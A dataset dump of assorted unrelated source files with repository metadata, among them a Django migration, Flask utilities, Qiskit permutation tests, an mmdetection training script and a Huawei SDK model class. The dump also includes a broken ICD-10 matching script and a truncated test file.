|
e181215cb13fb8115ec569045a2a436e59e5014d
|
53dd5d2cfb79edc87f6c606bbfb7d0bedcf6da61
|
/.history/EMR/SBSteat_20190605143628.py
|
436cd5b69bcdf8df0610fd888bd8a19bbd9dbf67
|
[] |
no_license
|
cyc19950621/python
|
4add54894dc81187211aa8d45e5115903b69a182
|
d184b83e73334a37d413306d3694e14a19580cb0
|
refs/heads/master
| 2020-04-11T20:39:34.641303
| 2019-07-02T12:54:49
| 2019-07-02T12:54:49
| 162,078,640
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 898
|
py
|
def SBS(A,B):
if A==0 or B ==0:
return 0
elif set(A)<=set(B) or set(B)<=set(A):
return 1
else:
return len(set(A)&set(B)) /len(set(A)|set(B))
def StrToList(A):
C=[]
for i in A:
C.append(i)
return C
import re
f = open('D:\DeepLearning ER\Z1006014.txt','r',errors='ignore')
g = open(r'C:\Users\Administrator\Desktop\ICD-10.txt','r',errors='ignore')
line_re=[]
lines = f.readlines()
dics=g.readlines()
out = []
for dic in disc:
dic=re.sub('\n','',dic)
for line in lines:
line=re.sub('\n','',line)
line=re.sub(' ','',line)
line = re.sub(r'\?|?', '',line)
line = re.sub(r'\,|\.|;','',line)
line_re.append(line)
while '' in line_re:
line_re.remove('')
for line in line_re:
for dic in disc:
dic=re.sub('\n','',dic)
if set(line) >= set(dic):
out.append(dic)
elif SBS(line,)
|
[
"1044801968@qq.com"
] |
1044801968@qq.com
|
0f0419366d770abc9585bc6c697d5ec7c3484d0b
|
000a4b227d970cdc6c8db192f4437698cb782721
|
/python/helpers/typeshed/stubs/pytz/pytz/tzinfo.pyi
|
c2c68526870de2234b2bef2a4957d2805ca999af
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
trinhanhngoc/intellij-community
|
2eb2f66a2a3a9456e7a0c5e7be1eaba03c38815d
|
1d4a962cfda308a73e0a7ef75186aaa4b15d1e17
|
refs/heads/master
| 2022-11-03T21:50:47.859675
| 2022-10-19T16:39:57
| 2022-10-19T23:25:35
| 205,765,945
| 1
| 0
|
Apache-2.0
| 2019-09-02T02:55:15
| 2019-09-02T02:55:15
| null |
UTF-8
|
Python
| false
| false
| 2,045
|
pyi
|
import datetime
from abc import abstractmethod
from typing import Any
class BaseTzInfo(datetime.tzinfo):
zone: str | None # Actually None but should be set on concrete subclasses
# The following abstract methods don't exist in the implementation, but
# are implemented by all sub-classes.
@abstractmethod
def localize(self, dt: datetime.datetime) -> datetime.datetime: ...
@abstractmethod
def normalize(self, dt: datetime.datetime) -> datetime.datetime: ...
@abstractmethod
def tzname(self, dt: datetime.datetime | None) -> str: ...
@abstractmethod
def utcoffset(self, dt: datetime.datetime | None) -> datetime.timedelta | None: ...
@abstractmethod
def dst(self, dt: datetime.datetime | None) -> datetime.timedelta | None: ...
class StaticTzInfo(BaseTzInfo):
def fromutc(self, dt: datetime.datetime) -> datetime.datetime: ...
def localize(self, dt: datetime.datetime, is_dst: bool | None = ...) -> datetime.datetime: ...
def normalize(self, dt: datetime.datetime, is_dst: bool | None = ...) -> datetime.datetime: ...
def tzname(self, dt: datetime.datetime | None, is_dst: bool | None = ...) -> str: ...
def utcoffset(self, dt: datetime.datetime | None, is_dst: bool | None = ...) -> datetime.timedelta: ...
def dst(self, dt: datetime.datetime | None, is_dst: bool | None = ...) -> datetime.timedelta: ...
class DstTzInfo(BaseTzInfo):
def __init__(self, _inf: Any = ..., _tzinfos: Any = ...) -> None: ...
def fromutc(self, dt: datetime.datetime) -> datetime.datetime: ...
def localize(self, dt: datetime.datetime, is_dst: bool | None = ...) -> datetime.datetime: ...
def normalize(self, dt: datetime.datetime) -> datetime.datetime: ...
def tzname(self, dt: datetime.datetime | None, is_dst: bool | None = ...) -> str: ...
def utcoffset(self, dt: datetime.datetime | None, is_dst: bool | None = ...) -> datetime.timedelta | None: ...
def dst(self, dt: datetime.datetime | None, is_dst: bool | None = ...) -> datetime.timedelta | None: ...
|
[
"intellij-monorepo-bot-no-reply@jetbrains.com"
] |
intellij-monorepo-bot-no-reply@jetbrains.com
|
02753e92896aace5a8746356bcdc3beaf50d75d0
|
255e90b6e98753c1b7530279064a9cf5da1a6866
|
/tests/migrations/0003_radiology_lab_name.py
|
7fd80843e89a480259326bde399b61a4a0ecdc38
|
[] |
no_license
|
MindSparkTm/clinicmanagement
|
31b5f66552da3cf51f900e2fd8a75c6e8228c56c
|
5c327126af75d342890645ead7dd835ef45111f7
|
refs/heads/master
| 2020-03-31T22:18:14.201928
| 2018-05-07T10:45:56
| 2018-05-07T10:45:56
| 152,613,900
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 477
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.10 on 2018-04-30 10:50
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('tests', '0002_auto_20180301_2340'),
]
operations = [
migrations.AddField(
model_name='radiology',
name='lab_name',
field=models.TextField(blank=True, max_length=100, null=True),
),
]
|
[
"smartsurajit2008@gmail.com"
] |
smartsurajit2008@gmail.com
|
872419719c7dbbacb98e8fe230dda1d95c9a3bb5
|
effab126713f246b35f43da6e24060fb5dbf7335
|
/dpxdt/server/utils.py
|
965851c3ad359459aff494c7ace9ec690aa87908
|
[
"Apache-2.0"
] |
permissive
|
jujugrrr/dpxdt
|
0a4552a2a87739e972960016881a36b6cd31648d
|
ee579f6027d0349e971a3eab070dad5756c54dcd
|
refs/heads/master
| 2021-01-23T20:38:32.729314
| 2013-07-01T05:38:24
| 2013-07-01T05:38:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,478
|
py
|
#!/usr/bin/env python
# Copyright 2013 Brett Slatkin
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common utility functions."""
import base64
import hashlib
import datetime
import logging
import traceback
import uuid
# Local libraries
import flask
from flask import abort, g, jsonify
# Local modules
from . import app
def jsonify_assert(asserted, message, status_code=400):
"""Asserts something is true, aborts the request if not."""
if asserted:
return
try:
raise AssertionError(message)
except AssertionError, e:
stack = traceback.extract_stack()
stack.pop()
logging.error('Assertion failed: %s\n%s',
str(e), ''.join(traceback.format_list(stack)))
abort(jsonify_error(e, status_code=status_code))
def jsonify_error(message_or_exception, status_code=400):
"""Returns a JSON payload that indicates the request had an error."""
if isinstance(message_or_exception, Exception):
message = '%s: %s' % (
message_or_exception.__class__.__name__, message_or_exception)
else:
message = message_or_exception
response = jsonify(error=message)
response.status_code = status_code
return response
# Based on http://flask.pocoo.org/snippets/33/
@app.template_filter()
def timesince(when):
"""Returns string representing "time since" or "time until".
Examples:
3 days ago, 5 hours ago, 3 minutes from now, 5 hours from now, now.
"""
if not when:
return ''
now = datetime.datetime.utcnow()
if now > when:
diff = now - when
suffix = 'ago'
else:
diff = when - now
suffix = 'from now'
periods = (
(diff.days / 365, 'year', 'years'),
(diff.days / 30, 'month', 'months'),
(diff.days / 7, 'week', 'weeks'),
(diff.days, 'day', 'days'),
(diff.seconds / 3600, 'hour', 'hours'),
(diff.seconds / 60, 'minute', 'minutes'),
(diff.seconds, 'second', 'seconds'),
)
for period, singular, plural in periods:
if period:
return '%d %s %s' % (
period,
singular if period == 1 else plural,
suffix)
return 'now'
def human_uuid():
"""Returns a good UUID for using as a human readable string."""
return base64.b32encode(
hashlib.sha1(uuid.uuid4().bytes).digest()).lower().strip('=')
def password_uuid():
"""Returns a good UUID for using as a password."""
return base64.b64encode(
hashlib.sha1(uuid.uuid4().bytes).digest()).strip('=')
# From http://flask.pocoo.org/snippets/53/
def after_this_request(func):
if not hasattr(g, 'call_after_request'):
g.call_after_request = []
g.call_after_request.append(func)
return func
@app.after_request
def per_request_callbacks(response):
for func in getattr(g, 'call_after_request', ()):
response = func(response)
return response
|
[
"brett@haxor.com"
] |
brett@haxor.com
|
fe07dd098da9c672cc8538933b82862e8803d26b
|
5cee94279b59f56c39987b94d4a85ca8a4f6966d
|
/app/asset/urls.py
|
0a25a3c193a2987565c8e0ea2c27cd6c82ca1265
|
[
"MIT"
] |
permissive
|
S3Infosoft/s3-dam
|
19c10965dfb17d20c08f0e78b3b096febd646a96
|
67488be012d42cf5826350bff218db2bde70c5e5
|
refs/heads/master
| 2021-05-18T03:53:35.365250
| 2020-05-14T13:34:02
| 2020-05-14T13:34:02
| 251,092,565
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 275
|
py
|
from django.urls import path
from . import views
urlpatterns = [
path("uploadPhoto", views.uploadPhoto, name="uploadPhoto"),
path("uploadDocument/", views.uploadDocument, name="uploadDocument"),
path("viewDocument/", views.viewDocument, name="viewDocument"),
]
|
[
"itssvinayak@gmail.com"
] |
itssvinayak@gmail.com
|
f9b1b694244da3da3ffd59310e2ccfbf529dcd42
|
497e25618ccb09b6f237bb99400d1595d86e15ab
|
/src/12_ItemSetsGenerator.py
|
6d595fbcc263d9b28b8df68fd1bce336abd6f64b
|
[
"CC-BY-4.0"
] |
permissive
|
curation-library-t/dataset2
|
dec966efb8b7ba1f2f94c69a293c6272df8ebcd5
|
681bd425a34d5ca04888e1c1bceefdf69008365d
|
refs/heads/master
| 2021-01-03T10:03:43.702735
| 2020-03-10T04:03:25
| 2020-03-10T04:03:25
| 240,017,931
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,157
|
py
|
import sys
import urllib
import json
import argparse
import urllib.request
import os
import yaml
import shutil
dir = "../docs/omeka/item_sets"
if os.path.exists(dir):
shutil.rmtree(dir)
os.makedirs(dir, exist_ok=True)
def item_sets_generator():
f = open("settings.yml", "r+")
data = yaml.load(f)
api_url = data["api_url"]
loop_flg = True
page = 1
while loop_flg:
url = api_url + "/item_sets?page=" + str(
page)
print(url)
page += 1
request = urllib.request.Request(url)
response = urllib.request.urlopen(request)
response_body = response.read().decode("utf-8")
data = json.loads(response_body.split('\n')[0])
if len(data) > 0:
for i in range(len(data)):
obj = data[i]
oid = str(obj["o:id"])
with open(dir+"/"+oid+".json", 'w') as outfile:
json.dump(obj, outfile, ensure_ascii=False,
indent=4, sort_keys=True, separators=(',', ': '))
else:
loop_flg = False
if __name__ == "__main__":
item_sets_generator()
|
[
"na.kamura.1263@gmail.com"
] |
na.kamura.1263@gmail.com
|
130b47b6f853783598aaa0f501090f289177b6d9
|
d2c229f74a3ca61d6a22f64de51215d9e30c5c11
|
/test/python/circuit/library/test_permutation.py
|
bf4da582b6ad52f9dbf9fc95e2ab2575ecbaf4ea
|
[
"Apache-2.0"
] |
permissive
|
1ucian0/qiskit-terra
|
90e8be8a7b392fbb4b3aa9784c641a818a180e4c
|
0b51250e219ca303654fc28a318c21366584ccd3
|
refs/heads/main
| 2023-08-31T07:50:33.568824
| 2023-08-22T01:52:53
| 2023-08-22T01:52:53
| 140,555,676
| 6
| 1
|
Apache-2.0
| 2023-09-14T13:21:54
| 2018-07-11T09:52:28
|
Python
|
UTF-8
|
Python
| false
| false
| 7,222
|
py
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Test permutation quantum circuits, permutation gates, and quantum circuits that
contain permutation gates."""
import io
import unittest
import numpy as np
from qiskit import QuantumRegister
from qiskit.test.base import QiskitTestCase
from qiskit.circuit import QuantumCircuit
from qiskit.circuit.exceptions import CircuitError
from qiskit.circuit.library import Permutation, PermutationGate
from qiskit.quantum_info import Operator
from qiskit.qpy import dump, load
class TestPermutationLibrary(QiskitTestCase):
"""Test library of permutation logic quantum circuits."""
def test_permutation(self):
"""Test permutation circuit."""
circuit = Permutation(num_qubits=4, pattern=[1, 0, 3, 2])
expected = QuantumCircuit(4)
expected.swap(0, 1)
expected.swap(2, 3)
expected = Operator(expected)
simulated = Operator(circuit)
self.assertTrue(expected.equiv(simulated))
def test_permutation_bad(self):
"""Test that [0,..,n-1] permutation is required (no -1 for last element)."""
self.assertRaises(CircuitError, Permutation, 4, [1, 0, -1, 2])
class TestPermutationGate(QiskitTestCase):
"""Tests for the PermutationGate class."""
def test_permutation(self):
"""Test that Operator can be constructed."""
perm = PermutationGate(pattern=[1, 0, 3, 2])
expected = QuantumCircuit(4)
expected.swap(0, 1)
expected.swap(2, 3)
expected = Operator(expected)
simulated = Operator(perm)
self.assertTrue(expected.equiv(simulated))
def test_permutation_bad(self):
"""Test that [0,..,n-1] permutation is required (no -1 for last element)."""
self.assertRaises(CircuitError, PermutationGate, [1, 0, -1, 2])
def test_permutation_array(self):
"""Test correctness of the ``__array__`` method."""
perm = PermutationGate([1, 2, 0])
# The permutation pattern means q1->q0, q2->q1, q0->q2, or equivalently
# q0'=q1, q1'=q2, q2'=q0, where the primed values are the values after the
# permutation. The following matrix is the expected unitary matrix for this.
# As an example, the second column represents the result of applying
# the permutation to |001>, i.e. to q2=0, q1=0, q0=1. We should get
# q2'=q0=1, q1'=q2=0, q0'=q1=0, that is the state |100>. This corresponds
# to the "1" in the 5 row.
expected_op = np.array(
[
[1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 0],
[0, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 1],
]
)
self.assertTrue(np.array_equal(perm.__array__(dtype=int), expected_op))
def test_pattern(self):
"""Test the ``pattern`` method."""
pattern = [1, 3, 5, 0, 4, 2]
perm = PermutationGate(pattern)
self.assertTrue(np.array_equal(perm.pattern, pattern))
def test_inverse(self):
"""Test correctness of the ``inverse`` method."""
perm = PermutationGate([1, 3, 5, 0, 4, 2])
# We have the permutation 1->0, 3->1, 5->2, 0->3, 4->4, 2->5.
# The inverse permutations is 0->1, 1->3, 2->5, 3->0, 4->4, 5->2, or
# after reordering 3->0, 0->1, 5->2, 1->3, 4->4, 2->5.
inverse_perm = perm.inverse()
expected_inverse_perm = PermutationGate([3, 0, 5, 1, 4, 2])
self.assertTrue(np.array_equal(inverse_perm.pattern, expected_inverse_perm.pattern))
class TestPermutationGatesOnCircuit(QiskitTestCase):
"""Tests for quantum circuits containing permutations."""
def test_append_to_circuit(self):
"""Test method for adding Permutations to quantum circuit."""
qc = QuantumCircuit(5)
qc.append(PermutationGate([1, 2, 0]), [0, 1, 2])
qc.append(PermutationGate([2, 3, 0, 1]), [1, 2, 3, 4])
self.assertIsInstance(qc.data[0].operation, PermutationGate)
self.assertIsInstance(qc.data[1].operation, PermutationGate)
def test_inverse(self):
"""Test inverse method for circuits with permutations."""
qc = QuantumCircuit(5)
qc.append(PermutationGate([1, 2, 3, 0]), [0, 4, 2, 1])
qci = qc.inverse()
qci_pattern = qci.data[0].operation.pattern
expected_pattern = [3, 0, 1, 2]
# The inverse permutations should be defined over the same qubits but with the
# inverse permutation pattern.
self.assertTrue(np.array_equal(qci_pattern, expected_pattern))
self.assertTrue(np.array_equal(qc.data[0].qubits, qci.data[0].qubits))
def test_reverse_ops(self):
"""Test reverse_ops method for circuits with permutations."""
qc = QuantumCircuit(5)
qc.append(PermutationGate([1, 2, 3, 0]), [0, 4, 2, 1])
qcr = qc.reverse_ops()
# The reversed circuit should have the permutation gate with the same pattern and over the
# same qubits.
self.assertTrue(np.array_equal(qc.data[0].operation.pattern, qcr.data[0].operation.pattern))
self.assertTrue(np.array_equal(qc.data[0].qubits, qcr.data[0].qubits))
def test_conditional(self):
"""Test adding conditional permutations."""
qc = QuantumCircuit(5, 1)
qc.append(PermutationGate([1, 2, 0]), [2, 3, 4]).c_if(0, 1)
self.assertIsNotNone(qc.data[0].operation.condition)
def test_qasm(self):
"""Test qasm for circuits with permutations."""
qr = QuantumRegister(5, "q0")
circuit = QuantumCircuit(qr)
pattern = [2, 4, 3, 0, 1]
permutation = PermutationGate(pattern)
circuit.append(permutation, [0, 1, 2, 3, 4])
circuit.h(qr[0])
expected_qasm = (
"OPENQASM 2.0;\n"
'include "qelib1.inc";\n'
"gate permutation__2_4_3_0_1_ q0,q1,q2,q3,q4 { swap q2,q3; swap q1,q4; swap q0,q3; }\n"
"qreg q0[5];\n"
"permutation__2_4_3_0_1_ q0[0],q0[1],q0[2],q0[3],q0[4];\n"
"h q0[0];\n"
)
self.assertEqual(expected_qasm, circuit.qasm())
def test_qpy(self):
"""Test qpy for circuits with permutations."""
circuit = QuantumCircuit(6, 1)
circuit.cx(0, 1)
circuit.append(PermutationGate([1, 2, 0]), [2, 4, 5])
circuit.h(4)
print(circuit)
qpy_file = io.BytesIO()
dump(circuit, qpy_file)
qpy_file.seek(0)
new_circuit = load(qpy_file)[0]
self.assertEqual(circuit, new_circuit)
if __name__ == "__main__":
unittest.main()
|
[
"noreply@github.com"
] |
1ucian0.noreply@github.com
|
2a04439769c443bb7d6866e0bfea6b0721b05f7e
|
8f1137592d670ce134821106f736e231b03ead87
|
/tools/train.py
|
21516fd5c10c33bf28186ffedadee978be1c9997
|
[
"MIT"
] |
permissive
|
mousecpn/DMC-Domain-Generalization-for-Underwater-Object-Detection
|
fa426c834fa2a5cd2fe98c50dd4dfeda64fcdc79
|
133797cfb7553557fb81a37e3c99c88154a13765
|
refs/heads/master
| 2023-05-23T16:49:34.795363
| 2023-02-13T02:23:31
| 2023-02-13T02:23:31
| 501,597,077
| 16
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,020
|
py
|
# Copyright (c) OpenMMLab. All rights reserved.
import argparse
import copy
import os
import os.path as osp
import time
import warnings
import mmcv
import torch
from mmcv import Config, DictAction
from mmcv.runner import get_dist_info, init_dist
from mmcv.utils import get_git_hash
from mmdet import __version__
from mmdet.apis import set_random_seed, train_detector
from mmdet.datasets import build_dataset
from mmdet.models import build_detector
from mmdet.utils import collect_env, get_root_logger
def parse_args():
parser = argparse.ArgumentParser(description='Train a detector')
parser.add_argument('config', help='train config file path')
parser.add_argument('--work-dir', help='the dir to save logs and models')
parser.add_argument(
'--resume-from', help='the checkpoint file to resume from')
parser.add_argument(
'--no-validate',
action='store_true',
help='whether not to evaluate the checkpoint during training')
group_gpus = parser.add_mutually_exclusive_group()
group_gpus.add_argument(
'--gpus',
type=int,
help='number of gpus to use '
'(only applicable to non-distributed training)')
group_gpus.add_argument(
'--gpu-ids',
type=int,
nargs='+',
help='ids of gpus to use '
'(only applicable to non-distributed training)')
parser.add_argument('--seed', type=int, default=None, help='random seed')
parser.add_argument(
'--deterministic',
action='store_true',
help='whether to set deterministic options for CUDNN backend.')
parser.add_argument(
'--options',
nargs='+',
action=DictAction,
help='override some settings in the used config, the key-value pair '
'in xxx=yyy format will be merged into config file (deprecate), '
'change to --cfg-options instead.')
parser.add_argument(
'--cfg-options',
nargs='+',
action=DictAction,
help='override some settings in the used config, the key-value pair '
'in xxx=yyy format will be merged into config file. If the value to '
'be overwritten is a list, it should be like key="[a,b]" or key=a,b '
'It also allows nested list/tuple values, e.g. key="[(a,b),(c,d)]" '
'Note that the quotation marks are necessary and that no white space '
'is allowed.')
parser.add_argument(
'--launcher',
choices=['none', 'pytorch', 'slurm', 'mpi'],
default='none',
help='job launcher')
parser.add_argument('--local_rank', type=int, default=0)
args = parser.parse_args()
if 'LOCAL_RANK' not in os.environ:
os.environ['LOCAL_RANK'] = str(args.local_rank)
if args.options and args.cfg_options:
raise ValueError(
'--options and --cfg-options cannot be both '
'specified, --options is deprecated in favor of --cfg-options')
if args.options:
warnings.warn('--options is deprecated in favor of --cfg-options')
args.cfg_options = args.options
return args
def main():
args = parse_args()
cfg = Config.fromfile(args.config)
if args.cfg_options is not None:
cfg.merge_from_dict(args.cfg_options)
# import modules from string list.
if cfg.get('custom_imports', None):
from mmcv.utils import import_modules_from_strings
import_modules_from_strings(**cfg['custom_imports'])
# set cudnn_benchmark
if cfg.get('cudnn_benchmark', False):
torch.backends.cudnn.benchmark = True
# work_dir is determined in this priority: CLI > segment in file > filename
if args.work_dir is not None:
# update configs according to CLI args if args.work_dir is not None
cfg.work_dir = args.work_dir
elif cfg.get('work_dir', None) is None:
# use config filename as default work_dir if cfg.work_dir is None
cfg.work_dir = osp.join('./work_dirs',
osp.splitext(osp.basename(args.config))[0])
if args.resume_from is not None:
cfg.resume_from = args.resume_from
if args.gpu_ids is not None:
cfg.gpu_ids = args.gpu_ids
else:
cfg.gpu_ids = range(1) if args.gpus is None else range(args.gpus)
# init distributed env first, since logger depends on the dist info.
if args.launcher == 'none':
distributed = False
else:
distributed = True
init_dist(args.launcher, **cfg.dist_params)
# re-set gpu_ids with distributed training mode
_, world_size = get_dist_info()
cfg.gpu_ids = range(world_size)
# create work_dir
mmcv.mkdir_or_exist(osp.abspath(cfg.work_dir))
# dump config
cfg.dump(osp.join(cfg.work_dir, osp.basename(args.config)))
# init the logger before other steps
timestamp = time.strftime('%Y%m%d_%H%M%S', time.localtime())
log_file = osp.join(cfg.work_dir, f'{timestamp}.log')
logger = get_root_logger(log_file=log_file, log_level=cfg.log_level)
# init the meta dict to record some important information such as
# environment info and seed, which will be logged
meta = dict()
# log env info
env_info_dict = collect_env()
env_info = '\n'.join([(f'{k}: {v}') for k, v in env_info_dict.items()])
dash_line = '-' * 60 + '\n'
logger.info('Environment info:\n' + dash_line + env_info + '\n' +
dash_line)
meta['env_info'] = env_info
meta['config'] = cfg.pretty_text
# log some basic info
logger.info(f'Distributed training: {distributed}')
logger.info(f'Config:\n{cfg.pretty_text}')
# set random seeds
if args.seed is not None:
logger.info(f'Set random seed to {args.seed}, '
f'deterministic: {args.deterministic}')
set_random_seed(args.seed, deterministic=args.deterministic)
cfg.seed = args.seed
meta['seed'] = args.seed
meta['exp_name'] = osp.basename(args.config)
model = build_detector(
cfg.model,
train_cfg=cfg.get('train_cfg'),
test_cfg=cfg.get('test_cfg'))
model.init_weights()
datasets = [build_dataset(cfg.data.train)]
if len(cfg.workflow) == 2:
val_dataset = copy.deepcopy(cfg.data.val)
val_dataset.pipeline = cfg.data.train.pipeline
datasets.append(build_dataset(val_dataset))
if cfg.checkpoint_config is not None:
# save mmdet version, config file content and class names in
# checkpoints as meta data
cfg.checkpoint_config.meta = dict(
mmdet_version=__version__ + get_git_hash()[:7],
CLASSES=datasets[0].CLASSES)
# add an attribute for visualization convenience
model.CLASSES = datasets[0].CLASSES
train_detector(
model,
datasets,
cfg,
distributed=distributed,
validate=(not args.no_validate),
timestamp=timestamp,
meta=meta)
if __name__ == '__main__':
import warnings
warnings.filterwarnings("ignore")
main()
|
[
"609731730@qq.com"
] |
609731730@qq.com
|
97113931b94c55421f7eaf0342e8779940eeaccc
|
a2d36e471988e0fae32e9a9d559204ebb065ab7f
|
/huaweicloud-sdk-ccm/huaweicloudsdkccm/v1/model/distinguished_name.py
|
9b1dc6bbb69cd65ec3602053c227ff83175ff3b8
|
[
"Apache-2.0"
] |
permissive
|
zhouxy666/huaweicloud-sdk-python-v3
|
4d878a90b8e003875fc803a61414788e5e4c2c34
|
cc6f10a53205be4cb111d3ecfef8135ea804fa15
|
refs/heads/master
| 2023-09-02T07:41:12.605394
| 2021-11-12T03:20:11
| 2021-11-12T03:20:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,640
|
py
|
# coding: utf-8
import re
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class DistinguishedName:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'common_name': 'str',
'country': 'str',
'locality': 'str',
'organization': 'str',
'organizational_unit': 'str',
'state': 'str'
}
attribute_map = {
'common_name': 'common_name',
'country': 'country',
'locality': 'locality',
'organization': 'organization',
'organizational_unit': 'organizational_unit',
'state': 'state'
}
def __init__(self, common_name=None, country=None, locality=None, organization=None, organizational_unit=None, state=None):
"""DistinguishedName - a model defined in huaweicloud sdk"""
self._common_name = None
self._country = None
self._locality = None
self._organization = None
self._organizational_unit = None
self._state = None
self.discriminator = None
if common_name is not None:
self.common_name = common_name
if country is not None:
self.country = country
if locality is not None:
self.locality = locality
if organization is not None:
self.organization = organization
if organizational_unit is not None:
self.organizational_unit = organizational_unit
if state is not None:
self.state = state
@property
def common_name(self):
"""Gets the common_name of this DistinguishedName.
通用名称
:return: The common_name of this DistinguishedName.
:rtype: str
"""
return self._common_name
@common_name.setter
def common_name(self, common_name):
"""Sets the common_name of this DistinguishedName.
通用名称
:param common_name: The common_name of this DistinguishedName.
:type: str
"""
self._common_name = common_name
@property
def country(self):
"""Gets the country of this DistinguishedName.
国家编码
:return: The country of this DistinguishedName.
:rtype: str
"""
return self._country
@country.setter
def country(self, country):
"""Sets the country of this DistinguishedName.
国家编码
:param country: The country of this DistinguishedName.
:type: str
"""
self._country = country
@property
def locality(self):
"""Gets the locality of this DistinguishedName.
地区名称
:return: The locality of this DistinguishedName.
:rtype: str
"""
return self._locality
@locality.setter
def locality(self, locality):
"""Sets the locality of this DistinguishedName.
地区名称
:param locality: The locality of this DistinguishedName.
:type: str
"""
self._locality = locality
@property
def organization(self):
"""Gets the organization of this DistinguishedName.
组织名称
:return: The organization of this DistinguishedName.
:rtype: str
"""
return self._organization
@organization.setter
def organization(self, organization):
"""Sets the organization of this DistinguishedName.
组织名称
:param organization: The organization of this DistinguishedName.
:type: str
"""
self._organization = organization
@property
def organizational_unit(self):
"""Gets the organizational_unit of this DistinguishedName.
组织单元名称
:return: The organizational_unit of this DistinguishedName.
:rtype: str
"""
return self._organizational_unit
@organizational_unit.setter
def organizational_unit(self, organizational_unit):
"""Sets the organizational_unit of this DistinguishedName.
组织单元名称
:param organizational_unit: The organizational_unit of this DistinguishedName.
:type: str
"""
self._organizational_unit = organizational_unit
@property
def state(self):
"""Gets the state of this DistinguishedName.
省市
:return: The state of this DistinguishedName.
:rtype: str
"""
return self._state
@state.setter
def state(self, state):
"""Sets the state of this DistinguishedName.
省市
:param state: The state of this DistinguishedName.
:type: str
"""
self._state = state
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, DistinguishedName):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"hwcloudsdk@huawei.com"
] |
hwcloudsdk@huawei.com
|
6ec74b00beccb475fbc8db105e3048f59664ccac
|
df541a802b2dfa89d3aab14af627358dc7c76e6e
|
/接口自动化/Frame_relevance/main.py
|
e79ef2e1e37151445218b5da1d27c4a22b306a77
|
[] |
no_license
|
gupan2018/PyAutomation
|
de966aff91f750c7207c9d3f3dfb488698492342
|
230aebe3eca5799c621673afb647d35a175c74f1
|
refs/heads/master
| 2021-09-07T19:44:20.710574
| 2017-12-22T15:58:23
| 2017-12-22T15:58:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 731
|
py
|
__author__ = 'Administrator'
'''
根据添加项目--审核--注册--充值--投资,做一个完整的业务流程的自动化代码请求
'''
from Frame_relevance.database import Database
from Frame_relevance.runcase import Runcase
from Frame_relevance.HttpRequest import HttpRequest
path_background = "db_background.conf"
path_test_data = "test_data.conf"
path_http = "http.conf"
path_mode = "mode.conf"
if __name__ == "__main__":
#获取后台数据库连接
cnn_background = Database(path_background).connect_db()
http = HttpRequest(path_http)
runcase = Runcase()
if runcase.run_Case(http,cnn_background, path_test_data) == False:
print("测试失败")
else:
print("测试成功")
|
[
"610077670@qq.com"
] |
610077670@qq.com
|
4aaa44a645f108b0de973b6f7119085e4cfadb95
|
45da48ae0a87f4bb27409bfe2e947b29a2d4a0d0
|
/znake/znake/test/test_tools.py
|
314367afe4e3c68ddcd06ff272e50992230a2700
|
[
"Apache-2.0"
] |
permissive
|
per-bohlin/opensourcelib
|
3923165982ae1b2c78602a3485684ded75c28c36
|
e48427fd0b5d87ea21484e85d2575c8b8879b9a3
|
refs/heads/master
| 2020-05-21T21:34:15.112527
| 2019-05-11T16:57:58
| 2019-05-11T16:57:58
| 186,156,987
| 0
| 0
|
NOASSERTION
| 2019-05-11T16:34:39
| 2019-05-11T16:34:39
| null |
UTF-8
|
Python
| false
| false
| 1,495
|
py
|
from unittest import TestCase
from unittest.mock import Mock
from znake.tools import _render_isort, _render_yapf, render_flake8_check, render_pydocstyle_check
class TestToolsRenderCommandLine(TestCase):
@staticmethod
def get_ctx(tool):
ctx = Mock()
